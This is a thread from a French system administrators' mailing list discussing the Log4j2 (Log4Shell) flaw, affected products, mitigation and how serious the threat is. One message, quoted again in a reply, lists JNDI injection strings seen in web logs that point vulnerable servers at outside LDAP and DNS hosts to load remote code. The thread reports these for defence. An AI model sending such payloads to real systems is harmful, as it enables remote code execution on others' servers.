Re: [FRsAG] Faille Log4j2

[Julien Escario]

Bonjour,

Tentons de reprendre le cours normal de ce thread : j'ai passé la
journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy'
justement un peu partout et j'ai été très surpris de la faible surface
d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu
lire et ici là.

Alors, on a très peu de trucs en Java, langage que je fuis depuis
quelques années déjà par respect pour la RAM de mes machines mais en
gros, à part Graylog, rien vu à mettre à jour en urgence.

Zimbra, pas touché
Puppet, pas touché
Big Blue Button, pas touché

Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de
passer -Dlog4j2.formatMsgNoLookups=true

Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai
un bout de script qui se contente de faire un 'touch /tmp/pwned'

Bonne journée,

Julien


Le 13/12/2021 à 15:18, Seb Astien a écrit :
> Qui n'a plus de legacy de nos jours ?
>
> Le lun. 13 déc. 2021 à 14:54, Vincent Habchi  > a écrit :
>
> > On 13 Dec 2021, at 13:18, David Ponzone  > wrote:
> >
> > Pour ceux qui l’auraient raté:
>
> Qui utilise encore Apache de nos jours ?
>
> V.
>
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/ 
>
>
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[David Durieux]

Bonjour, 

Ton retour est complètement biaisé

"j'ai été très surpris de la faible surface d'attaque "
"on a très peu de trucs en Java, langage que je fuis depuis quelques années"

c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas
d'être très touché.

C'est comme si tu disais que tu évite les serveurs Microsoft mais que
tu sois surpris de la faible surface d'attaque sur le RDP \o/

Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a
énormément).

Ce message est juste pour éviter de minimiser ce problème de log4j.

Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis
le 10 décembre.

David Durieux



On Tue, 14 Dec 2021 09:02:47 +0100
Julien Escario  wrote:

> Bonjour,
> 
> Tentons de reprendre le cours normal de ce thread : j'ai passé la
> journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy'
> justement un peu partout et j'ai été très surpris de la faible surface
> d'attaque que nous avons par rapport aux cris d’orfraies que j'ai pu
> lire et ici là.
> 
> Alors, on a très peu de trucs en Java, langage que je fuis depuis
> quelques années déjà par respect pour la RAM de mes machines mais en
> gros, à part Graylog, rien vu à mettre à jour en urgence.
> 
> Zimbra, pas touché
> Puppet, pas touché
> Big Blue Button, pas touché
> 
> Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant
> de passer -Dlog4j2.formatMsgNoLookups=true
> 
> Si quelqu'un veut un test d'exploitation sur un service vulnérable,
> j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'
> 
> Bonne journée,
> 
> Julien
> 
> 
> Le 13/12/2021 à 15:18, Seb Astien a écrit :
> > Qui n'a plus de legacy de nos jours ?
> >
> > Le lun. 13 déc. 2021 à 14:54, Vincent Habchi  > > a écrit :
> >
> > > On 13 Dec 2021, at 13:18, David Ponzone
> > >  > > wrote:
> > >
> > > Pour ceux qui l’auraient raté:
> >
> > Qui utilise encore Apache de nos jours ?
> >
> > V.
> >
> > ___
> > Liste de diffusion du FRsAG
> > http://www.frsag.org/ 
> >
> >
> > ___
> > Liste de diffusion du FRsAG
> > http://www.frsag.org/

___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Laurent Barme]

Bonjour,

Même approche (estimer la portée réelle de la menace avant de s'affoler) et même 
constat : cette "faille" rejoint la liste des appels à la panique inutiles, du 
moins pour ce qui me concerne.


Je relève une centaine "d'attaques" (avant blocage automatique), toutes depuis 
le 10/12/21 sur les Url :


${jndi:ldap://152.89.239.12:1389/bt2f6m}
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D
/$%7Bjndi:ldap://167.71.13.196:/lx-33fe1d7bbb0100fee1b6611ef879%7D
/${jndi:dns:/45.83.64.1/securityscan-http80}
/${jndi:dns:/45.83.64.1/securityscan-https443}
/${jndi:ldap:/45.130.229.168:1389/Exploit}
/${jndi:ldap:/45.83.193.150:1389/Exploit}
/${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}

qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.

A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 (Internet 
Security Research Project), ce qui conforte la suggestion de Maxime à propos des 
conflits d'intérêt de la part des acteurs œuvrant officiellement pour la lutte 
contre les pirates.


Cordialement,

Laurent Barme

Le 14/12/2021 à 09:02, Julien Escario a écrit :


Bonjour,

Tentons de reprendre le cours normal de ce thread : j'ai passé la journée 
d'hier à tenter d'exploiter la faille sur des trucs 'legacy' justement un peu 
partout et j'ai été très surpris de la faible surface d'attaque que nous avons 
par rapport aux cris d’orfraies que j'ai pu lire et ici là.


Alors, on a très peu de trucs en Java, langage que je fuis depuis quelques 
années déjà par respect pour la RAM de mes machines mais en gros, à part 
Graylog, rien vu à mettre à jour en urgence.


Zimbra, pas touché
Puppet, pas touché
Big Blue Button, pas touché

Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant de 
passer -Dlog4j2.formatMsgNoLookups=true


Si quelqu'un veut un test d'exploitation sur un service vulnérable, j'ai un 
bout de script qui se contente de faire un 'touch /tmp/pwned'


Bonne journée,

Julien


Le 13/12/2021 à 15:18, Seb Astien a écrit :

Qui n'a plus de legacy de nos jours ?

Le lun. 13 déc. 2021 à 14:54, Vincent Habchi > a écrit :


> On 13 Dec 2021, at 13:18, David Ponzone mailto:david.ponz...@gmail.com>> wrote:
>
> Pour ceux qui l’auraient raté:

Qui utilise encore Apache de nos jours ?

V.

___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/



___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Julien Escario]

Le 14/12/2021 à 09:53, David Durieux a écrit :
> Bonjour, 
>
> Ton retour est complètement biaisé
>
> "j'ai été très surpris de la faible surface d'attaque "
> "on a très peu de trucs en Java, langage que je fuis depuis quelques années"
>
> c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas
> d'être très touché.
>
> C'est comme si tu disais que tu évite les serveurs Microsoft mais que
> tu sois surpris de la faible surface d'attaque sur le RDP \o/

OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que
l'avis des autres ne t’intéresse pas.

Évidemment que mon retour est biaisé, lequel ne l'est pas ?

Pourquoi ai-je précisé que nous avions peu de choses basées sur Java et
que j'ai ensuite listé les applications que j'ai repérées/testées ? Ca
permet de mettre ce que l'on appelle communément du contexte et de juger
de la profondeur du biais justement.

> Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a
> énormément).

Et tu as une source pour ton affirmation ? Énormément, c'est quoi ?
Combien utilisent log4j ?

Du coup, si tu veux faire un commentaire utile, entre les boites de
sécurité qui annoncent ça comme la faille de la décennie et mon vécu
avec très peu d'impact, tu as un retour factuel à faire ?

> Ce message est juste pour éviter de minimiser ce problème de log4j.

Le problème est évidemment sérieux puisque exploitable publiquement sur
des services généralement exposés. Mais encore une fois, je me demande
si la surface d'attaque est aussi importante qu'annoncé.

Par contre, lorsque la faille est présente, le service est très facile à
violer. Le CVSS3 tiens compte de ces deux aspects.

> Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis
> le 10 décembre.

Oui, même chose. De même, j'ai plusieurs milliers de tentatives de brute
force SSH chaque minute sur les serveurs pour lesquels ce n'est pas
firewallé. Ce n'est pas pour autant que je fais ma drama-queen sécuritaire.

Julien



___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Wallace]

Dans les logiciels impactés que l'on a du mettre à jour rapidement, tous 
les Jitsi, c'est du Java en public donc bien vulnérable.


Et même si les Elasticsearch, Greylog et autre joyeuseté y compris du 
dev de nos clients sont cachés derrière des firewalls on a fait ce qu'il 
faut pour les logiciels avec des mises à jour et configuration et pour 
nos clients ont a prévenu et demandé des majs qu'on attend.


Le 14/12/2021 à 10:10, Laurent Barme a écrit :


Bonjour,

Même approche (estimer la portée réelle de la menace avant de 
s'affoler) et même constat : cette "faille" rejoint la liste des 
appels à la panique inutiles, du moins pour ce qui me concerne.


Je relève une centaine "d'attaques" (avant blocage automatique), 
toutes depuis le 10/12/21 sur les Url :


${jndi:ldap://152.89.239.12:1389/bt2f6m}
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D
/$%7Bjndi:ldap://167.71.13.196:/lx-33fe1d7bbb0100fee1b6611ef879%7D
/${jndi:dns:/45.83.64.1/securityscan-http80}
/${jndi:dns:/45.83.64.1/securityscan-https443}
/${jndi:ldap:/45.130.229.168:1389/Exploit}
/${jndi:ldap:/45.83.193.150:1389/Exploit}
/${jndi:ldaps:/a5384.probe001.log4j.leakix.net:8443/b}

qui retournent un 400, 403 ou 404 sur les quelques serveurs que je gère.

A noter que plus de 60% de ces attaques proviennent de 45.83.64.0/32 
(Internet Security Research Project), ce qui conforte la suggestion de 
Maxime à propos des conflits d'intérêt de la part des acteurs œuvrant 
officiellement pour la lutte contre les pirates.


Cordialement,

Laurent Barme

Le 14/12/2021 à 09:02, Julien Escario a écrit :


Bonjour,

Tentons de reprendre le cours normal de ce thread : j'ai passé la 
journée d'hier à tenter d'exploiter la faille sur des trucs 'legacy' 
justement un peu partout et j'ai été très surpris de la faible 
surface d'attaque que nous avons par rapport aux cris d’orfraies que 
j'ai pu lire et ici là.


Alors, on a très peu de trucs en Java, langage que je fuis depuis 
quelques années déjà par respect pour la RAM de mes machines mais en 
gros, à part Graylog, rien vu à mettre à jour en urgence.


Zimbra, pas touché
Puppet, pas touché
Big Blue Button, pas touché

Unifi est touché à priori mais je n'ai pas réussi à l'exploiter avant 
de passer -Dlog4j2.formatMsgNoLookups=true


Si quelqu'un veut un test d'exploitation sur un service vulnérable, 
j'ai un bout de script qui se contente de faire un 'touch /tmp/pwned'


Bonne journée,

Julien


Le 13/12/2021 à 15:18, Seb Astien a écrit :

Qui n'a plus de legacy de nos jours ?

Le lun. 13 déc. 2021 à 14:54, Vincent Habchi  a 
écrit :


> On 13 Dec 2021, at 13:18, David Ponzone
 wrote:
>
> Pour ceux qui l’auraient raté:

Qui utilise encore Apache de nos jours ?

V.

___
Liste de diffusion du FRsAG
http://www.frsag.org/


___
Liste de diffusion du FRsAG
http://www.frsag.org/



___
Liste de diffusion du FRsAG
http://www.frsag.org/



___
Liste de diffusion du FRsAG
http://www.frsag.org/___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Dominique Rousseau]

Le Tue, Dec 14, 2021 at 10:33:00AM +0100, Wallace [wall...@morkitu.org] a écrit:
> Et même si les Elasticsearch, Greylog et autre joyeuseté y compris du dev de
> nos clients sont cachés derrière des firewalls on a fait ce qu'il faut pour
> les logiciels avec des mises à jour et configuration et pour nos clients ont
> a prévenu et demandé des majs qu'on attend.

Surtout qu'au delà de la RCE, tu as aussi le risque de fuite de données,
puisque des variables peuvent passer dans un lookup dns, meme si le flux
ne sort pas.



-- 
Dominique Rousseau 
Neuronnexion, Prestataire Internet & Intranet
6 rue des Hautes cornes - 8 Amiens
tel: 03 22 71 61 90 - fax: 03 22 71 61 99 - http://www.neuronnexion.coop
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Jeremy Monnet]

On Tue, Dec 14, 2021 at 10:18 AM Julien Escario 
wrote:

> > C'est comme si tu disais que tu évite les serveurs Microsoft mais que
> > tu sois surpris de la faible surface d'attaque sur le RDP \o/
>
> OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que
> l'avis des autres ne t’intéresse pas.
>
Depuis 2 ans j'ai les mêmes mots de l'année : tolérance et bienveillance.


>
> Et tu as une source pour ton affirmation ? Énormément, c'est quoi ?
> Combien utilisent log4j ?
>
> Du coup, si tu veux faire un commentaire utile, entre les boites de
> sécurité qui annoncent ça comme la faille de la décennie et mon vécu
> avec très peu d'impact, tu as un retour factuel à faire ?
>
> Nous avons plusieurs logiciels impactés (qui utilisent log4j ou dont
l'éditeur traite la faille, je n'ai fait aucun test pour le coup), aucun
"internet facing" :
- vmware (vcenter, orchestrator, nsx)
- des logiciels de gestion de baies de stackage
- rundeck
- symantec antivirus

Tous les services java, serveurs d'appli jboss, websphere, etc sont
vulnérables dès lors qu'ils sont joignables (ils sont derrière des reverse
proxies qui peuvent protéger, si ils sont configurés pour). La menace
peut aussi être interne, même si on a tendance à la minimiser...

Mes 2 cents,

Jeremy
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[F. S.]

My two cents concernant le "énormément" : le NCSC (équiv. ANSSI aux
Pays-Bas) a mis en ligne un dépôt GitHub avec des indicateurs de
compromission, ainsi qu'une liste des produits impactés/non impactés :

https://github.com/NCSC-NL/log4shell/tree/main/software

Sur 1600 entrées, environ 200 sont marquées comme vulnérables. Vous noterez
que beaucoup de services cloud, chez AWS notamment, étaient vulnérables,
mais ont été patchés depuis. Ce qui explique l'ampleur potentiel de
l'impact, et pourquoi tout le monde s'est bougé ce week end pour évaluer
ses produits et patcher si nécessaire.

--
Florian STOSSE | Ingénieur en sécurité informatique


Le mar. 14 déc. 2021 à 10:17, Julien Escario  a
écrit :

> Le 14/12/2021 à 09:53, David Durieux a écrit :
> > Bonjour,
> >
> > Ton retour est complètement biaisé
> >
> > "j'ai été très surpris de la faible surface d'attaque "
> > "on a très peu de trucs en Java, langage que je fuis depuis quelques
> années"
> >
> > c'est une attaque lié à JAVA, donc si tu évite d'en avoir tu risque pas
> > d'être très touché.
> >
> > C'est comme si tu disais que tu évite les serveurs Microsoft mais que
> > tu sois surpris de la faible surface d'attaque sur le RDP \o/
>
> OK, bonne ambiance ! Tu pourrais limiter ton commentaire à dire que
> l'avis des autres ne t’intéresse pas.
>
> Évidemment que mon retour est biaisé, lequel ne l'est pas ?
>
> Pourquoi ai-je précisé que nous avions peu de choses basées sur Java et
> que j'ai ensuite listé les applications que j'ai repérées/testées ? Ca
> permet de mettre ce que l'on appelle communément du contexte et de juger
> de la profondeur du biais justement.
>
> > Il y a des gens qui ont pas mal d'applications en JAVA (et il y en a
> > énormément).
>
> Et tu as une source pour ton affirmation ? Énormément, c'est quoi ?
> Combien utilisent log4j ?
>
> Du coup, si tu veux faire un commentaire utile, entre les boites de
> sécurité qui annoncent ça comme la faille de la décennie et mon vécu
> avec très peu d'impact, tu as un retour factuel à faire ?
>
> > Ce message est juste pour éviter de minimiser ce problème de log4j.
>
> Le problème est évidemment sérieux puisque exploitable publiquement sur
> des services généralement exposés. Mais encore une fois, je me demande
> si la surface d'attaque est aussi importante qu'annoncé.
>
> Par contre, lorsque la faille est présente, le service est très facile à
> violer. Le CVSS3 tiens compte de ces deux aspects.
>
> > Sur mes serveurs, j'ai eu des tentatives d'attaques (logs web) depuis
> > le 10 décembre.
>
> Oui, même chose. De même, j'ai plusieurs milliers de tentatives de brute
> force SSH chaque minute sur les serveurs pour lesquels ce n'est pas
> firewallé. Ce n'est pas pour autant que je fais ma drama-queen sécuritaire.
>
> Julien
>
>
>
> ___
> Liste de diffusion du FRsAG
> http://www.frsag.org/
>
___
Liste de diffusion du FRsAG
http://www.frsag.org/

Re: [FRsAG] Faille Log4j2

[Vincent Tondellier via FRsAG]

On lundi 13 décembre 2021 13:18:50 CET, David Ponzone wrote:

Pour ceux qui l’auraient raté:

https://nvd.nist.gov/vuln/detail/CVE-2021-44228 


Ce n'est pas complétement terminé, même si ca semble mois grave cette fois 
:

https://www.openwall.com/lists/oss-security/2021/12/14/4
___
Liste de diffusion du FRsAG
http://www.frsag.org/